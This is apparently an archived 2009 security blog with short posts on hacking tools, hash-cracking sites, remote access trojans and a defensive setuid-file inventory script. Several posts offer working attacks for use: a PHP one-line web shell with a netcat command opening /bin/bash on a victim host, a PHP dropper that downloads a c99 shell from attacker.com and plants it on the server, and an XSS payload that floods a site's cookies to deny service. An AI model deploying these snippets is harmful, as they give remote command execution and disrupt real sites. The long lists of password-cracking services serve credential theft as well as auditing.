PHP 1-line execute

<?php system($_GET[cmd]);?>

echo that to a file on a system, or use the previous example to call it, and you can run http://victim.com/whatever.php?cmd=nc -lvp 4040 -e /bin/bash and you'll have a shell waiting for you.

Load txt file as PHP

A pretty sick use of php ;-)

<?php
       $shell = "http://attacker.com/c99madshell.txt"; //use something less obvious like readme.txt
       $code = file_get_contents($shell);   // fetch the remote text file
       $fp=fopen("Sh3ll.php","w+");        // create a new .php file on the web server
       fwrite($fp, $code);                  // write the fetched contents into it
       fclose($fp);
?>


Shell Code Development

Place has some pretty sick shellcode: http://www.shell-storm.org/

Huge List of Online Crackers

Don't know if all of these are online still or not:
Source: http://blackhat.ge/?page_id=29

http://www.milw0rm.com/cracker/
http://www.plain-text.info/add/
http://www.securitystats.com/tools/hashcrack.php
http://www.passcrack.spb.ru/
http://gdataonline.com/seekhash.php
http://www.md5-brute.com/
http://www.md5encryption.com/
http://www.insidepro.com/hashes.php?lang=rus
http://www.cirt.net/cgi-bin/passwd.pl
http://passcracking.ru
http://www.hashchecker.com/?_sls=add_hash
http://www.tydal.nu/category/
http://md5.dustinfineout.com/
http://www.md5-db.com/
http://www.md5hashes.com/
http://sha1search.com/
http://md5.xpzone.de/
http://www.csthis.com/md5/
http://md5.benramsey.com/
http://www.md5this.com/crack-it-/index.php
http://hackerscity.free.fr/
http://ice.breaker.free.fr/
http://md5search.deerme.org/
http://www.md5decrypter.com/
http://securitydb.org/cracker/
http://plain-text.info/index/
http://www.tmto.org/?category=main&page=home
http://md5.geeks.li/
http://hashreverse.com/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://md5crack.it-helpnet.de/index.php?op=add
https://astalavista.net/index.php?
http://md5search.uk.to/

md5:
http://74.52.200.226/~b4ck/passhash/index.php
http://www.tmto.org/
http://md5.rednoize.com
http://nz.md5.crysm.net
http://us.md5.crysm.net
http://www.xmd5.org
http://gdataonline.com
http://www.hashchecker.com
http://passcracking.ru
http://www.milw0rm.com/md5
http://plain-text.info
http://www.securitystats.com/tools/hashcrack.php
http://www.schwett.com/md5/ - Does Norwegian words too
http://passcrack.spb.ru/
http://shm.pl/md5/
http://www.und0it.com/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://md5.geeks.li/
http://www.hashreverse.com/
http://www.cmd5.com/english.aspx
http://www.md5.altervista.org/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://alimamed.pp.ru/md5/ (for those who can't read Russian: put your md5 in the second box)
http://md5crack.it-helpnet.de/index.php?op=add
http://cijfer.hua.fi/
http://shm.hard-core.pl/md5/
http://www.mmkey.com/md5/HOME.ASP
http://www.thepanicroom.org/index.php?view=cracker
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/
http://www.securitydb.org/cracker/
http://passwordsecuritycenter.com/in…roducts_ id=7
http://0ptix.co.nr/md5
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com
http://www.pldsecurity.de/forum/md5.php
http://www.xeons.net/genesis/
http://hackerscity.free.fr/
http://bisix.cogia.net/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-crack/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.jock-security.com/md5_database/?page=crack
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.blackfiresecurity.com/tools/md5lib.php
http://www.md5-db.com/index.php

md4:
http://www.securitystats.com/tools/hashcrack.php
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/

sha1:
http://passcrack.spb.ru/
http://www.hashreverse.com/
http://rainbowcrack.com/
http://www.md5encryption.com/
http://www.shalookup.com/
http://md5.rednoize.com/
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.tmto.org/


Misc:
http://linardy.com/md5.php
http://www.gdataonline.com/seekhash.php
https://www.w4ck1ng.com/cracker/
http://search.cpan.org/~blwood/Digest-MD5-Reverse-1.3/
http://www.hashchecker.com/index.php?_sls=search_hash
http://www.rainbowcrack-online.com/
http://schwett.com/md5/
http://www.md5.org.cn/index_en.htm
http://www.xmd5.org/index_en.htm
http://nz.md5.crysm.net/
http://us.md5.crysm.net/
http://gdataonline.com/seekhash.php
http://passcracking.ru/
http://shm.pl/md5/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://www.hashreverse.com/
http://alimamed.pp.ru/md5/
http://md5crack.it-helpnet.de/index.php?op=add
http://shm.hard-core.pl/md5/
http://rainbowcrack.com/
http://passwordsecuritycenter.com/index.ph…p;products_id=7
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com/
http://hackerscity.free.fr/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-crack/
http://passcracking.com/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.md5-db.com/index.php
http://md5.idiobase.de/
http://md5search.deerme.org/
http://sha1search.com/

User Profile Deletion Utility

Index of PHP Shells

REVIEW THE CODE BEFORE USING ANY WEB SHELL!!

http://blacknite.eu/php_shells/


Thursday, May 14, 2009

Finding SUID/SGID root programs

Source: http://www.faqs.org/docs/securing/chap5sec62.html

EDIT: It doesn't look like it, but it's all one line:
find / -type f \( -perm -04000 -o -perm -02000 \) -exec ls -lg {} \;
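The find command gives you a one-off listing; what you usually want on a host you defend is the same inventory kept as a baseline, so that a setuid binary that appears later stands out. The script below is an added example in Python written for this page, not from the linked guide: it applies the same test as the find command (regular file with the setuid or setgid bit), walks without following symlinks, and diffs the result against a saved baseline. The baseline file format ("octal-mode path" per line) is my own convention, and the paths in the self-check are constructed.

```python
"""Inventory setuid/setgid files under a root and diff the result against a
saved baseline (added example, not from the linked guide)."""
import os
import stat
import sys
from typing import Dict, Set


def is_setuid_or_setgid(mode: int) -> bool:
    """Same test as: find -type f \\( -perm -04000 -o -perm -02000 \\)."""
    return stat.S_ISREG(mode) and bool(mode & (stat.S_ISUID | stat.S_ISGID))


def find_privileged_files(root: str) -> Dict[str, int]:
    """Walk root and return {path: permission bits} for every regular file
    carrying the setuid or setgid bit. Symlinks are not followed."""
    found: Dict[str, int] = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)      # lstat: examine the link itself, not its target
            except OSError:
                continue                 # vanished or unreadable: keep scanning
            if is_setuid_or_setgid(st.st_mode):
                found[path] = stat.S_IMODE(st.st_mode)
    return found


def diff_against_baseline(current: Dict[str, int], baseline: Dict[str, int]) -> Dict[str, Set[str]]:
    """Report files that gained privilege bits since the baseline, lost them,
    or changed mode. The 'added' set is what to investigate first."""
    both = set(current) & set(baseline)
    return {
        "added": set(current) - set(baseline),
        "removed": set(baseline) - set(current),
        "changed": {p for p in both if current[p] != baseline[p]},
    }


def format_baseline(found: Dict[str, int]) -> str:
    """Serialize as 'octal-mode path' lines, sorted, for saving to disk."""
    return "\n".join(f"{mode:04o} {path}" for path, mode in sorted(found.items()))


def parse_baseline(text: str) -> Dict[str, int]:
    """Inverse of format_baseline; blank lines and '#' comments are ignored."""
    out: Dict[str, int] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        mode, path = line.split(" ", 1)
        out[path] = int(mode, 8)
    return out


if __name__ == "__main__":
    # usage: suidcheck.py [root] [baseline-file]
    root = sys.argv[1] if len(sys.argv) > 1 else "/"
    current = find_privileged_files(root)
    if len(sys.argv) > 2:
        with open(sys.argv[2]) as fh:
            baseline = parse_baseline(fh.read())
        for kind, paths in diff_against_baseline(current, baseline).items():
            for p in sorted(paths):
                print(f"{kind}: {p} ({current.get(p, baseline.get(p, 0)):04o})")
    else:
        print(format_baseline(current))   # no baseline yet: print one to save
```

Save the first run's output as the baseline (`python3 suidcheck.py / > suid.baseline`), then re-run with the baseline as the second argument on a schedule; anything in `added` that you did not install via a package update deserves a look.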


Wednesday, May 13, 2009

WIGS - Website Information Gathering Scanner

A TON of information, in one click, without touching the site yourself. ;-)

http://sucuri.net/index.php?page=scan

Also, my other favorite is: http://www.serversniff.net/



Tuesday, May 12, 2009

List of x86 Instructions

Don't Censor Me!

LeetUpload.com

An awesome repository of interesting doodads and toys for hackers / security 'pros'

Proceed with caution. There are pointy objects ahead:
http://www.leetupload.com/

"Official" Metasploit Documentation

Hex Editor - Frhed

I've been searching for a free hex editor that had the features I need and the search is finally over.

http://frhed.sourceforge.net/

Thanks @marcusjcarey


Sunday, May 10, 2009

XSS based Client-side DoS

Sets roughly 200KB of cookies for the site on the client, per subdomain.
http://pastebin.com/f3dfe04f7

/*<script>/*code to create a 200KB of cookies per subdomain*/with(document)domain.replace(/[^.]*\.?/g,function(a){try{domain=domain.replace(a,"")}catch(e){a=""}finally{for(i=0;i<50;i++)cookie=i+"="+Array(4095)+";expires=9 Jan 2038 23:59 GMT;path=/;domain=."+a+domain}})//</script>

I pasted the code in case it gets lost on Pastebin

Fravia's Swansong

Saturday, May 9, 2009

This is why you're fat

Not security related, but hilarious. Come on, who hasn't had a Choco Taco.
http://thisiswhyyourefat.com

Sunday, May 3, 2009

Stock Photo Sites

Links to 16 of them. Why is this good for you? It will help with those presentations you have to give:
http://www.softalize.com/2009/04/14/16-ultimate-collection-of-free-stock-photo-sites/

ErrMess

Another really fun RAT to play with: http://www.errmess.com/

Megapanzer

RAT, and some interesting history dumping ;-)

http://www.megapanzer.com/source-code/

Saturday, April 18, 2009

Web Sniffer

Good site for recon without touching the host:

http://web-sniffer.net



Wednesday, March 25, 2009

SQL Injection Not Just 1=1 Slides

Good slide deck on SQLMap - one of those greatly underestimated tools:

Cracking passwords with Wikipedia

Sebastien Raveau shares his trick for cracking passwords using Wikipedia rather than a dictionary. Combine this with wordlist-based rainbow tables and you have quite the effective cracking machine.
Tricks of the Trade: Cracking passwords with Wikipedia, Wiktionary, Wikibooks etc

You can find Sebastien on Twitter: @sraveau



Saturday, March 21, 2009

How to present while people are twittering

Not technical but a very good article for presenters in this twitter/socmed age:
http://pistachioconsulting.com/twitter-presentations/